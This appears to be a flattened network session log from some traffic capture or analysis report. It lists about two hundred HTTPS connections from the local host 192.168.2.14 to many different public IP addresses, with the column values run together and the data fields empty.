                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10846192.168.2.1460974146.199.43.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10847192.168.2.1459968177.20.170.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10848192.168.2.1453438193.227.229.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10849192.168.2.1449444193.161.55.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10850192.168.2.144962880.196.135.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10851192.168.2.146061820.212.125.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10852192.168.2.1452478163.84.111.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10853192.168.2.1455500121.168.218.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10854192.168.2.1458350187.38.162.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10855192.168.2.1454058117.166.115.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10856192.168.2.1447536153.67.198.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10857192.168.2.1448154190.104.78.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10858192.168.2.146033054.123.130.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10859192.168.2.1454062135.15.130.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10860192.168.2.14569248.104.218.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10861192.168.2.1457326138.161.195.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10862192.168.2.145963473.96.229.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10863192.168.2.1437270148.248.33.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10864192.168.2.1441600211.184.185.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10865192.168.2.145951474.222.51.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10866192.168.2.144350864.217.112.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10867192.168.2.145272473.189.36.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10868192.168.2.1454030163.141.97.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10869192.168.2.1455590101.154.161.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10870192.168.2.143999668.128.25.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10871192.168.2.145373425.104.162.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10872192.168.2.1452844146.217.22.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10873192.168.2.1444650114.179.232.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10874192.168.2.144173059.216.210.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10875192.168.2.1460030106.159.249.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10876192.168.2.1436986106.41.20.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10877192.168.2.1449858128.103.207.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10878192.168.2.1451782191.41.245.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10879192.168.2.1443334212.177.67.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10880192.168.2.143748620.218.141.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10881192.168.2.1436092118.49.131.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10882192.168.2.1443336212.216.226.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10883192.168.2.1450392156.183.79.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10884192.168.2.1446260150.153.197.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10885192.168.2.145609441.22.18.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10886192.168.2.144080695.255.143.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10887192.168.2.1457468204.212.46.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10888192.168.2.144408089.145.94.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10889192.168.2.1460372140.200.66.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10890192.168.2.144137679.77.30.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10891192.168.2.144879461.104.98.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10892192.168.2.143872286.14.139.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10893192.168.2.1458068181.243.116.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10894192.168.2.145118696.202.92.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10895192.168.2.143930446.96.48.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10896192.168.2.14366382.151.141.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10897192.168.2.1459548171.250.162.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10898192.168.2.1449746163.230.218.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10899192.168.2.1434068102.117.80.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10900192.168.2.1443606125.20.83.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10901192.168.2.144195490.181.238.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10902192.168.2.145135825.109.70.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10903192.168.2.1437254154.90.23.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10904192.168.2.1443304104.88.47.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10905192.168.2.1454524220.220.24.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10906192.168.2.1435732151.168.119.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10907192.168.2.1452972180.152.32.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10908192.168.2.1439490165.149.13.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10909192.168.2.1451972156.91.151.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10910192.168.2.1446908204.94.227.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10911192.168.2.145379442.116.99.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10912192.168.2.144402891.88.183.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10913192.168.2.1436544174.197.141.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10914192.168.2.1438466156.237.149.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10915192.168.2.144281875.94.208.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10916192.168.2.1457242157.126.243.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10917192.168.2.144356249.208.134.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10918192.168.2.1437062121.208.254.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10919192.168.2.145112453.122.219.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10920192.168.2.145034032.184.128.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10921192.168.2.1453882211.186.208.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10922192.168.2.145646064.102.211.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10923192.168.2.143518217.129.126.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10924192.168.2.1453512212.208.162.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10925192.168.2.1435698162.103.165.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10926192.168.2.1457702150.208.127.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10927192.168.2.143925881.222.117.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10928192.168.2.1459698172.212.23.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10929192.168.2.143641497.97.147.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10930192.168.2.1442726125.151.237.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10931192.168.2.1438286119.75.39.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10932192.168.2.1442302201.71.188.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10933192.168.2.1451864176.41.194.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10934192.168.2.145756471.18.43.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10935192.168.2.143544491.62.197.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10936192.168.2.145082812.22.40.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10937192.168.2.1448058185.168.1.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10938192.168.2.145372299.109.98.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10939192.168.2.145876282.27.222.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10940192.168.2.144655062.77.54.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10941192.168.2.143868492.52.179.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10942192.168.2.1440116121.64.44.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10943192.168.2.144758477.188.88.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10944192.168.2.143499414.20.44.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10945192.168.2.143445046.221.31.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10946192.168.2.1438820171.117.232.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10947192.168.2.1439616113.138.40.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10948192.168.2.1458898181.97.113.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10949192.168.2.1458512111.79.209.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10950192.168.2.1437510221.243.182.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10951192.168.2.145750866.26.149.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10952192.168.2.1446020140.203.246.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10953192.168.2.14400362.239.254.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10954192.168.2.144154842.121.123.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10955192.168.2.1445812189.173.180.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10956192.168.2.1454848222.9.27.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10957192.168.2.1450140130.160.24.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10958192.168.2.1452534108.201.221.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10959192.168.2.1440174122.232.208.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10960192.168.2.1442498149.49.249.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10961192.168.2.1440282107.88.8.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10962192.168.2.144855495.126.13.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10963192.168.2.1453190181.184.68.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10964192.168.2.1445434145.51.148.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10965192.168.2.144566848.3.243.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10966192.168.2.1438966153.247.217.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10967192.168.2.1445680158.249.209.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10968192.168.2.144333280.221.37.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10969192.168.2.144284258.15.229.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10970192.168.2.144514094.12.172.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10971192.168.2.1457418165.162.112.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10972192.168.2.1439414216.146.59.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10973192.168.2.1455986187.230.168.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10974192.168.2.1443172211.49.207.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10975192.168.2.145496499.149.126.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10976192.168.2.144290624.56.153.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10977192.168.2.144666080.88.172.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10978192.168.2.145660692.103.20.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10979192.168.2.143394837.161.139.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10980192.168.2.143681053.191.19.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10981192.168.2.1436590120.153.203.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10982192.168.2.1438302218.69.218.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10983192.168.2.1443212173.86.253.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10984192.168.2.1455322143.33.3.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10985192.168.2.1456252149.96.204.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10986192.168.2.1439126190.214.89.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10987192.168.2.144901846.219.253.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10988192.168.2.1444652158.173.58.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10989192.168.2.145194464.54.183.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10990192.168.2.1448810105.38.214.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10991192.168.2.1460666121.111.46.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10992192.168.2.1447008107.124.208.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10993192.168.2.143399271.251.209.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10994192.168.2.144299698.20.222.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10995192.168.2.1445054180.240.240.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10996192.168.2.143954494.205.158.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10997192.168.2.1437284150.85.224.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10998192.168.2.144048212.107.128.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10999192.168.2.1458986219.87.224.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11000192.168.2.1437066157.133.159.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11001192.168.2.1436562162.173.141.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11002192.168.2.1458888205.81.165.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11003192.168.2.146093872.94.65.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11004192.168.2.1440194148.48.72.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11005192.168.2.1432874158.233.28.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11006192.168.2.1458758194.52.44.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11007192.168.2.1458116115.203.115.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11008192.168.2.1460896140.236.75.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11009192.168.2.145942635.99.96.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11010192.168.2.1441506118.59.113.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11011192.168.2.1436620186.147.29.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11012192.168.2.1435148209.156.244.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11013192.168.2.144583267.161.176.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11014192.168.2.1449214131.177.20.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11015192.168.2.1446562206.44.26.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11016192.168.2.1447802203.124.69.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11017192.168.2.1444852118.221.226.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11018192.168.2.1450766168.215.210.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11019192.168.2.1442748136.45.52.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11020192.168.2.1455206101.216.2.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11021192.168.2.1439182124.45.107.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11022192.168.2.1456198206.150.231.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11023192.168.2.1447164204.224.11.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11024192.168.2.1450468192.175.109.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11025192.168.2.1446634191.250.125.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11026192.168.2.1458958144.47.225.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11027192.168.2.1446926124.206.125.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11028192.168.2.1437820112.161.248.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11029192.168.2.1448650216.212.124.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11030192.168.2.1438568157.170.133.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11031192.168.2.145814847.245.66.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11032192.168.2.145278842.133.194.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11033192.168.2.1441200220.186.121.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11034192.168.2.1458134181.79.131.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11035192.168.2.143495877.39.174.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11036192.168.2.1458088143.71.212.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11037192.168.2.146024012.127.26.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11038192.168.2.1456438173.82.47.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11039192.168.2.1433090107.212.20.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11040192.168.2.1459852122.170.228.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11041192.168.2.145951091.238.124.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11042192.168.2.1438788207.233.23.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11043192.168.2.1446226177.173.68.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11044192.168.2.144831298.188.242.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11045192.168.2.1457088125.218.40.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11046192.168.2.1440522199.171.44.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11047192.168.2.143570667.135.128.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11048192.168.2.1434356130.63.102.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11049192.168.2.1439802168.249.70.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11050192.168.2.144501669.6.68.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11051192.168.2.145216891.240.230.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11052192.168.2.145061439.232.147.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11053192.168.2.14599465.40.77.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11054192.168.2.145983834.30.188.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11055192.168.2.1457770116.105.60.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11056192.168.2.1457734187.87.200.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11057192.168.2.1459858157.155.218.133443
                                                        TimestampBytes transferredDirectionData


